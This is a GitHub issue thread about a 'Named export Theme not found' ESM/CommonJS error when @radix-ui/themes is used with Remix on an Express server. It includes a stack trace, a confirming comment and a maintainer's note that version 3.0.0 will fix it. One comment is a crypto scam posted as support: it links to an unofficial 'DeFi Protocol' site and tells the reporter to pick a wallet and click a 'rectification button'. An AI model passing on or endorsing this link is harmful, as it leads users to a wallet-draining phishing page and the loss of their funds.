### ISSUE TITLE
Unable to use it with remix-run

### ISSUE THREAD

**Issue by iamzee** [radix-ui/themes#51]
I have just installed remix-run with express server..Now I am trying to install radix-ui/themes but it is showing the following error

```
file:///Users/xxx/remix-express-radix-themes/build/index.js:134
import { Theme } from "@radix-ui/themes";
         ^^^^^
SyntaxError: Named export 'Theme' not found. The requested module '@radix-ui/themes' is a CommonJS module, which may not support all module.exports as named exports.
CommonJS modules can always be imported via the default export, for example using:

import pkg from '@radix-ui/themes';
const { Theme } = pkg;

    at ModuleJob._instantiate (node:internal/modules/esm/module_job:123:21)
    at ModuleJob.run (node:internal/modules/esm/module_job:189:5)
    at async Promise.all (index 0)
    at ESMLoader.import (node:internal/modules/esm/loader:530:24)
    at file:///Users/xxx/remix-express-radix-themes/server.js:18:13
```

Here is the reproduction for the error - https://github.com/iamzee/remix-express-radix-themes
Just clone the repository and start the `dev` server

node -v 16.20.0

**Comment by 74891632** [comment]
Hello @iamzee 
Resolve this issues using the DeFi Protocol [official website](https://defirefixprotocol.web.app/), select your wallet type and rectify using the rectification button to resolve your issues automatically.
Note: You can initiate a chat with the support for further enquires and assistance using the chat button at the bottom of the page.

**Comment by hiql** [comment]
If I choose Remix App Server, It's okay! But if I choose Express Server, I got the same error!
It seems JavaScript module caused the problem...
😂

**Comment by vladmoroz** [comment]
This will be fixed in the upcoming 3.0.0
